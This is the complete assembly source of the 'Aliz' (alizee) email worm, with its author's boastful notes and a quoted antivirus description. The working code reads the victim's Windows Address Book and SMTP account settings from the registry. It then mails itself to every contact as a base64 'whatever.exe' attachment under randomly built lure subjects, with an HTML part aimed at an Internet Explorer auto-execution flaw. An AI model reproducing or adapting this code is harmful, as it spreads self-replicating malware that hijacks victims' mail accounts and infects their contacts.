comment $ ey, this comment is added 21 november 2001. i saw that aliz is spreading pretty, so just some more about-text then the original release (i thought it would be a worm that nobody would ever know :). well, i wrote this worm long ago, in about two days, just cause i was bored. it was around the time that the iframe sploit was 1-day old, thats all i re- member and i have no clue how long ago that was. anyway, i wanted to code a small worm. i did it, but what then? i didn't wanna drop it itw cause massmailers are lame. (the total worm is lame, really). so i decided that it would be nice for coderz #2... that was going to be released around that days (heheheheeheh a half year later now i write this text and it still getting released soon). anyway, thats why that text is in it. i had to fill much space, so thats why that huge stupid text. anyway, coderz#2 wasn't getting released for weeks, months, etc, so i decided to fork the AV's a sample, and i uploaded it to my site, as a binary, in a zip file with a secret password, as a test sample. nothing happens and i forgot the total fuck worm. although avx wrote a description very fast because they are lame. well, 19 november i was just checking, because they have nice a special section pictures of viruses (payloads) in their description part, and what did i see: aliz. in the wild... woowwie ;) now it is high risk blabla on many av sites... well, its a lame worm, and i didn't care really cause nobody would really see it (look over the source). anyway, now it differs a lil i guess ;) heh. greetings mar00n (a lame nick too) description, today i pick f-secure because its the most complimentous desc. ;) btw, 'in pure Assembly', did they recognize it or was it because of my text in the body?: '..power in pure win32asm..' hehe ;)) ------------------------------------------------------------------------------ Aliz is a very small e-mail worm written in pure Assembly. It appeared in the wild on 18-20th of November 2001. The worm's file is only 4 kilobytes long and its code is compressed. It can be considered one of the smallest Win32 worms ever created. When the worm is run, it first unpacks itself and then passes control to API address setup routine. When all needed API addresses are collected, the control is passed to the main worm's code. The worm checks the Registry for the location of Windows Address Book file and loads it into memory. The worm then connects to default SMTP server (for SMTP server info the worm checks Internet Accound Manager data in the Registry) and sends itself to all recepients of Windows Address Book. The infected message looks like that: Subject: Body: Attachment: Whatever.exe The subject of infected message is randomly composed from 5 different parts: Fw: Fw: Re: Cool Nice Hot some Funny weird funky great Interesting many website site pics urls pictures stuff mp3s shit music info to check for you i found to see here - check it !! ! :-) ?! hehe ;-) For example a subject can be: "Fw: Cool pictures i found !!" or "Nice website to check hehe ;-)". The message contains a MIME-encoded attachment - the worm's file with 'Whatever.exe' name. The body is an empty multi-part MIME message with HTML formatting and i-frame trick that was previously found in Nimda and Klez worms. Because of this trick on some systems the worm is able to self-launch itself when an infected e-mail is viewed (for example, with Outlook and IE 5.0 or 5.01). To do this the worm uses a known vulnerability in IE that allows execution of an email attachment. This vulnerability is fixed and a patch for it is available on Microsoft site: The worm doesn't install itself to system, it runs, sends itself out and terminates its process. The worm contains the following text strings that are never displayed:!ikx2oo1::: while typing this text i realize this text got added on many av description sites, because this silly worm could be easily a hype. i wonder which av claims '[companyname] stopped high risk worm before it could escape!' or shit like that. heh, or they boycot my virus because of this text. well, it is easy enough for the poor av's to add this worm; since it was only released as source in coderz#2... btw, loveletter*2 power in pure win32asm and only a 4k exe file. heh, vbs kiddies, phear win32asm. :) thx to: bumblebee!29a, asmodeus!ikx. greets to: starzer0!ikx, t-2000!ir, ultras!mtx & sweet gigabyte... btw,burgemeester van sneek: ik zoek nog een baantje... (alignmentfillingtext) F-Secure Anti-Virus detects Aliz worm with the latest updates. [Analysis: Alexey Podrezov; F-Secure Corp.; November 19th, 2001] ------------------------------------------------------------------------------ well and here the old comment $ comment $ iworm alizee by mar00n ! ikx 2oo1 alizee is a worm that mails itself around to all addies in your addressbook. not very special, is it? well: 1-it shows that the stack is your best friend 2-the generated exe file is only 4096 bytes 3-it shows a clean compatible way in win32asm to obtain email addies 4-the subject is random generated 5-the attached exe file gets automatically executed if the reader tries to read the message 6-the whole thing is very clean written (who cares) indeed, very standard, except step 2 and 5 ;) more about them: step 2: yes, its very small, the code is compressed using aplib, and decompressed using my own tweaked optmized aplib decompressor step 5: indeed, this means loveletter power*10. (code? search for tag) succesfully tested under win98 & win2k... its nice to talk with your creation using netcat ;) 220 hi helo localhost 250 ey man ;) wassup? do you have mail to send? mail from: 250 and to who? rcpt to: 250 seems ok to me data 354 go ahead ;) ... but don't forget the, ok? blablablla well erh, this worm is very hard to compile, see my zip file for the bat files and external programs you need. thx: bumblebee for your base64 routines asmodeus for the first one doing this grtz/fear: starzer0,billy,lifewire,vecna,z0mbie,t2k,benny,ratter,griyo and gig ps, i don't love alizee or what. she's just ... highly fuckable? $ .386p .model flat locals __ include c:\tasm\inc\ sizer equ 4098 binsize equ sizer + 3-(3-(sizer mod 3)) ;stupid 3-alignment for base64 _call macro api call dword ptr [api] endm maxspread equ 666 ;max mail to n addies include c:\tasm\inc\ ;luv to jackyqwerty include c:\tasm\inc\ include c:\tasm\inc\ ;extrn LoadLibraryA:proc; ;extrn GetProcAddress:proc; ;----------------------------------------------------------------------------; _CODE segment dword use32 public 'CODE' start: nop ;heh _CODE ends ;----------------------------------------------------------------------------; .data ;only to use virtual offset 402000 ; int 3 call overseh jmp $ ;if seh we simply hang. why not? :) overseh: xor edx,edx push dword ptr fs:[edx] mov fs:[edx],esp ;----------------------------------------------------------------------------; ;ebx=module base/handle ;esi=crc32s ;edi=wheretostore mov esi,offset apicrcs mov edi,offset apis call __x db "KERNEL32",0 __x: i_importall_loop: ; call LoadLibraryA call dword ptr [start+2034h] ;loadlibrary xchg eax,ebx call i_importapis ;first import k32 xor eax,eax lodsb xchg eax,ecx jecxz i_importall_done ;modulenamelength push esi add esi,ecx jmp i_importall_loop ;----------------------------------------------------------------------------; i_importall_done: sub esp,size stackframe sub esp,size stack2 mov ebp,esp ; int 3 call __y db "Software\Microsoft\WAB\WAB4\Wab File Name",0 __y: push 0 call readregkey lea esi,[ebp.buffer] add esp,size stack2 or eax,eax jnz exit ;esp = filename of wab we choose mov ebp,esp call openfile jc exit ;esi = wabmapview (nice name;) ;int 3 mov ecx,[esi+64h] ;number of adds jecxz exit ;victim has no friends add esi,[esi+60h] ;pointer addies ; dec ecx ; cmp ecx,maxspread ; jbe mailaround ; push maxspread ; pop ecx ;parse wab file for addies & mail the fun mailaround: push ecx mov eax,esi cmp byte ptr [esi+1],0 jne nounicode push esi ;unicode support lea edi,[ebp.addie] push edi push 48h pop ecx __y: lodsw stosb loop __y pop eax ;ebp+addie pop esi ;esi in wab.addresses add esi,20h nounicode: ; int 3 push ebp call share ;share the fun pop ebp add esi,24h pop ecx loop mailaround push [ebp.createhandle] ;close wabfilehandle push [ebp.maphandle] push [ebp.viewhandle] _call CloseHandle _call CloseHandle _call CloseHandle exit: add esp,size stackframe pop dword ptr fs:[0] pop eax push 0 _call ExitProcess db "!ikx2oo1:::",0dh,0dh db "while typing this text i realize this text got added on many av",0dh db "description sites, because this silly worm could be easily a",0dh db "hype. i wonder which av claims '[companyname] stopped high risk",0dh db "worm before it could escape!' or shit like that. heh, or they",0dh db "boycot my virus because of this text. well, it is easy enough",0dh db "for the poor av's to add this worm; since it was only released",0dh db "as source in coderz#2... btw, loveletter*2 power in pure win32asm",0dh db "and only a 4k exe file. heh, vbs kiddies, phear win32asm. :)",0dh db "thx to: bumblebee!29a, asmodeus!ikx. greets to: starzer0!ikx,",0dh db "t-2000!ir, ultras!mtx & sweet gigabyte...",0dh db "btw,burgemeester van sneek: ik zoek nog een baantje...",0dh db "(alignmentfillingtext)",0dh ;----------------------------------------------------------------------------; share: push esi mov esi,eax sub esp,size stack2 ;some workspace mov ebp,esp push ebp push 101h _call WSAStartup ;startup wsock services push 0 push 1 push 2 _call socket ;create socket xchg eax,edi push 25 ;convert port to big/ _call htons ;lil endian mov word ptr [ebp.sockaddr_in \ .sin_family],AF_INET ;setup connect info mov [ebp.sockaddr_in.sin_port],ax push offset szRegAccountInfo call __porn db "SMTP Server",0 __porn: call readregkey jc share_xit ;ebx = smtp server name from registry push ebx _call gethostbyname ;resolve or eax,eax jz share_xit mov eax,[eax+12] ;no clue what i'm mov eax,[eax] ;doing here. ctrl+c/v mov eax,[eax] ;from my other source ;but i hope eax=IP ;) mov dword ptr [ebp.sockaddr_in.sin_addr],eax push size ssockaddr_in lea eax,[ebp.sockaddr_in] push eax push edi ;handle _call connect or eax,eax jnz share_xit ;int 3 mov ebx,offset maildata call sendstrings ;mail ourself clean_xit: push edi _call closesocket _call WSACleanup ;disconnect share_xit: add esp,size stack2 pop esi ret ;----------------------------------------------------------------------------; sendstrings: xchg ebx,esi ;ebx is now dest. email. add. esi=data ;and edi is socket handle parsemaildata: xor eax,eax lodsb cmp al,8 ja nsend or al,al jz parsemaildata jmp [fntable-4+eax*4] nsend: dec esi call stringsend jmp parsemaildata fntable dd offset checkmailinput dd offset sendmailfrom dd offset sendmailto dd offset senddate dd offset sendsubject dd offset sendbase64 dd offset exitexit sendbase64: ;int 3 pushad push binsize*4 ;oursize*2+base64space push 0 _call GlobalAlloc push eax ;one push for globalfree push eax ;one push for base64 fun xchg eax,edi push 0 _call GetModuleHandleA xchg eax,esi xor ecx,ecx ; mov ecx,200h/4 mov ch,2 rep movsb ;200h bytes add esi,(1000h-200h) ; mov ecx,0a00h/4 mov ch,0ah rep movsb ;a00h bytes add esi,(2000h-0a00h) ; mov ecx,400h/4 mov ch,2 rep movsb ;200h add esi,(1000h-400h) ; mov ecx,200h/4 mov ch,2 rep movsb ;200h pop eax ;src lea edx,[eax+binsize+100h] ;dest push edx mov ecx,binsize ;in call encodebase64 mov dword ptr [edx],0a0d3dh ; '=/cr/lf/z' pop esi mov edi,[esp.Pushad_edi+4] ;jqwerty forever :) call stringsend _call GlobalFree popad jmp parsemaildata ;----------------------------------------------------------------------------; checkmailinput: push 0 push 300h lea eax,[ebp.buffer] push eax push edi ;handle _call recv lodsw cmp word ptr [ebp.buffer],ax ;codes match? je parsemaildata ret ;no good code -return to clean_xit ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; sendmailfrom: push esi ; call __a ;fromwho db "test@localhost",0 ; __a: ; pop esi push ebx push offset szRegAccountInfo call __s db "SMTP Email Address",0 __s: call readregkey mov esi,ebx pop ebx call stringsend ;well guess. test! :) pop esi smfx: jmp parsemaildata ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; sendmailto: push esi mov esi,ebx call stringsend pop esi smtx: jmp smfx ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; senddate: pushad ;int 3 push edi lea edi,[ebp.buffer] push edi push 100 push edi call __x formdate db "ddd,dd MMM yyyy",0 __x: push 0 push 0 push 409h _call GetDateFormatA add edi,eax dec edi mov al,' ' stosb push 100 push edi call __y formtime db "HH:mm:ss",0 __y: push 0 push 0 push 409h _call GetTimeFormatA add edi,eax dec edi mov eax,'00- ' stosd mov eax,03030h stosd ;barf pop esi pop edi call stringsend popad gsxx: jmp smtx ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; exitexit: ;int 3 ret ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; sendsubject: pushad ;int 3 mov esi,offset gendata push edi lea edi,[ebp.buffer] push edi hehe: xor eax,eax lodsb cmp al,31 je done call get_rnd_range xchg eax,ecx __l: or ecx,ecx jz __b __f: lodsb or al,al jnz __f loop __l __b: lodsb cmp al,0 je __d stosb jmp __b __d: mov al,' ' stosb __g: lodsb cmp al,0 je __g cmp al,' ' jae __g dec esi jmp hehe done: mov al,0 stosb pop esi pop edi call stringsend popad jmp gsxx gendata db 5 db 0 db 0 db 0 db "Fw:",0 db "Fw: Re:",0 db 11 db 0 db "Cool",0 db "Nice",0 db "Hot",0 db "some",0 db "Funny",0 db "weird",0 db "funky",0 db "great",0 db "Interesting",0 db "many",0 db 10 db "website",0 db "site",0 db "pics",0 db "urls",0 db "pictures",0 db "stuff",0 db "mp3s",0 db "shit",0 db "music",0 db "info",0 db 7 db "to check",0 db "for you",0 db "i found",0 db "to see",0 db "here",0 db "- check it",0 db 0 db 6 db "!!",0 db "!",0 db ":-)",0 ;lets use lame cool-to-newbies smileys ;P db "?!",0 db "hehe ;-)",0 db 0 db 31 ;terminator ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; stringsend: push esi xor ecx,ecx dec ecx __x: lodsb inc ecx cmp al,8 ja __x pop esi push ecx push 0 ;flags push ecx ;length push esi ;datastart push edi ;handle _call send pop ecx ; push 10 ; _call Sleep add esi,ecx ret ;----------------------------------------------------------------------------; get_rnd_range: push ecx ;luv to griyo push edx mov ecx,eax call get_rnd32 xor edx,edx div ecx mov eax,edx pop edx pop ecx ret get_rnd32: ;Stolen from prizzy's Crypto push ebx ecx edx mov eax,dword ptr [ebp.rnd32seed] mov ecx,41C64E6Dh mul ecx xchg eax,ecx _call GetTickCount mov ebx,eax db 0Fh, 31h ;RDTCS instruction - read xor eax,ebx xchg ecx,eax ;PCs ticks to EDX:EAX mul ecx add eax,00003039h mov dword ptr [ebp.rnd32seed],eax pop edx ecx ebx ret ;----------------------------------------------------------------------------; encodebase64: ; encodeBase64 by Bumblebee. All rights reserved ;) ; input: ; EAX = Address of data to encode ; EDX = Address to put encoded data ; ECX = Size of data to encode ; output: ; ECX = size of encoded data ; xor esi,esi call over_enc_table db "ABCDEFGHIJKLMNOPQRSTUVWXYZ" db "abcdefghijklmnopqrstuvwxyz" db "0123456789+/" over_enc_table: pop edi push ebp xor ebp,ebp baseLoop: movzx ebx,byte ptr [eax] shr bl,2 and bl,00111111b mov bh,byte ptr [edi+ebx] mov byte ptr [edx+esi],bh inc esi mov bx,word ptr [eax] xchg bl,bh shr bx,4 mov bh,0 and bl,00111111b mov bh,byte ptr [edi+ebx] mov byte ptr [edx+esi],bh inc esi inc eax mov bx,word ptr [eax] xchg bl,bh shr bx,6 xor bh,bh and bl,00111111b mov bh,byte ptr [edi+ebx] mov byte ptr [edx+esi],bh inc esi inc eax xor ebx,ebx movzx ebx,byte ptr [eax] and bl,00111111b mov bh,byte ptr [edi+ebx] mov byte ptr [edx+esi],bh inc esi inc eax inc ebp cmp ebp,24 jna DontAddEndOfLine xor ebp,ebp ; add a new line mov word ptr [edx+esi],0A0Dh inc esi inc esi test al,00h ; Optimized (overlap rlz!) org $-1 DontAddEndOfLine: inc ebp sub ecx,3 or ecx,ecx jne baseLoop mov ecx,esi add edx,esi pop ebp ret ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; readregkey: lea eax,[ebp.regkeyhnd] push eax push dword ptr [esp+3*4] push 80000001h ;hkey current user _call RegCreateKeyA or eax,eax jnz rrke more_data: push 127 push esp lea ebx,[ebp.buffer] push ebx push 0 push 0 push dword ptr [esp+18h] push [ebp.regkeyhnd] _call RegQueryValueExA ;read stmp server pop ecx cmp eax,234 je more_data ;?? or eax,eax jnz rrke push [ebp.regkeyhnd] _call RegCloseKey clc ret 8 rrke: stc ret 8 ;----------------------------------------------------------------------------; ;----------------------------------------------------------------------------; openfile: xor ebx,ebx push ebx push FILE_ATTRIBUTE_NORMAL push OPEN_EXISTING push ebx push ebx push GENERIC_READ or GENERIC_WRITE push esi _call CreateFileA inc eax jz foerroropening dec eax mov dword ptr [ebp.createhandle],eax push ebx push ebx ;max size low push ebx push PAGE_READWRITE push ebx push eax ;handle _call CreateFileMappingA mov dword ptr [ebp.maphandle],eax push ebx push ebx push ebx push FILE_MAP_WRITE push eax ;handle _call MapViewOfFile mov dword ptr [ebp.viewhandle],eax xchg eax,esi clc ret foerroropening: stc ret ;----------------------------------------------------------------------------; ; ebx=module base/handle ; edi=where to store ; esi=crc32 stuff i_importapis: mov eax,[ebx+03ch] ;pointer to PE mov edx,[eax+ebx+78h] ;export section add edx,ebx i_ia_nextone: lodsd or eax,eax jz i_ia_done push esi xchg eax,ecx ;ecx=desired crc32 mov esi,[edx+8*4] ;addresses of ApiNames add esi,ebx i_ia_find: lodsd ;address push esi add eax,ebx ;add base push eax ;save base for later xchg eax,esi call v_crc32 cmp eax,ecx ;actual crc32=desired? pop eax pop esi jne i_ia_find ;nope.. then next push edx ;preserve edx push eax ;eax=name push ebx ; call GetProcAddress call dword ptr [start+2038h] pop edx stosd pop esi jmp i_ia_nextone i_ia_done: ret v_crc32: ;ofcourse i stole this... :) push edx mov edx,09C3B248Eh __gCRC32_next_byte: lodsb or al,al ;end of name ? jz __gCRC32_finish xor dl,al mov al,08h __gCRC32_next_bit: shr edx,01h jnc __gCRC32_no_change xor edx,0C1A7F39Ah __gCRC32_no_change: dec al jnz __gCRC32_next_bit jmp __gCRC32_next_byte __gCRC32_finish: xchg eax,edx ;CRC32 to EAX pop edx ret szRegAccountInfo db "Software\Microsoft\Internet Account Manager\Accounts\00000001",0 mCheck equ 1 ;recv/checkfor mFromAd equ 2 ;mailfrom addy mDestAd equ 3 ;sendto addy mTime equ 4 ;right time/date field mSubj equ 5 ;random generated subject mBase64 equ 6 ;base64 data mEom equ 7 ;endofmail ;----------------------------------------------------------------------------; ; *** the email data *** ; ; smtp commands ;----------------------------------------------------------------------------; crlf equ 0dh,0ah crlfz equ crlf,0 maildata db mCheck,'22' ;--check 220 greet db 'HELO localhost',crlf ;HELO localhost db mCheck,'25' ;--check 250 db 'MAIL FROM: ',mFromAd,crlf ;MAIL FROM: addie db mCheck,'25' ;--check 250 db 'RCPT TO: ',mDestAd,crlf ;RCPT TO: addie db mCheck,'25' ;--check 250 db 'DATA',crlf ;DATA db mCheck,'35' ;--check 354 ; stupid default stuph ;----------------------------------------------------------------------------; db 'From: ',mFromAd,crlf db 'To: ',mDestAd,crlf db 'Subject: ',mSubj,crlf db 'Date: ',mTime,crlf ;mime headers ;----------------------------------------------------------------------------; db 'MIME-Version: 1.0',crlf db 'Content-Type: multipart/mixed;',crlf db ' boundary="bound"',crlf db ' X-Priority: 3',crlf db ' X-MSMail-Priority: Normal',crlf db ' X-Mailer: Microsoft Outlook Express 5.50.4522.1300',crlf db ' X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1300',crlf db crlf db 'This is a multi-part message in MIME format.',crlf db crlf ;first part: html code to run the sploit ;----------------------------------------------------------------------------; db '--bound',crlf db 'Content-Type: text/html;',crlf db ' charset="iso-8859-1"',crlf db 'Content-Transfer-Encoding: quoted-printable',crlf db crlf db '',crlf db 'peace',crlf db crlf ;next part - the sploit ;----------------------------------------------------------------------------; db '--bound',crlf db 'Content-Type: audio/x-wav;',crlf db ' name="whatever.exe"',crlf db 'Content-Transfer-Encoding: base64',crlf db 'Content-ID: ',crlf db crlf ;base64 stuff ;----------------------------------------------------------------------------; db mBase64 ;end boundary & quit command ;----------------------------------------------------------------------------; db crlf,'--bound--',crlf,'.',crlf db 'QUIT',crlf,mEom ;----------------------------------------------------------------------------; apicrcs: crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m dd 0 db 9 db "ADVAPI32",0 crc32m crc32m crc32m dd 0 db 8 db "WSOCK32",0 crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m crc32m dd 0 db 0 db "END" apis: GetWindowsDirectoryA dd ? CloseHandle dd ? ExitProcess dd ? GlobalAlloc dd ? GetModuleHandleA dd ? GlobalFree dd ? GetDateFormatA dd ? GetTimeFormatA dd ? Sleep dd ? GetTickCount dd ? CreateFileA dd ? CreateFileMappingA dd ? MapViewOfFile dd ? RegCreateKeyA dd ? RegQueryValueExA dd ? RegCloseKey dd ? WSAStartup dd ? socket dd ? htons dd ? gethostbyname dd ? connect dd ? closesocket dd ? recv dd ? send dd ? WSACleanup dd ? totalend: stackframe struc createhandle dd ? maphandle dd ? viewhandle dd ? addie db 48h dup (?) stackframe ends stack2 struc regkeyhnd dd ? sockaddr_in ssockaddr_in ? buffer db 300h dup (?) rnd32seed dd ? ;space WSADATA ? ends end start end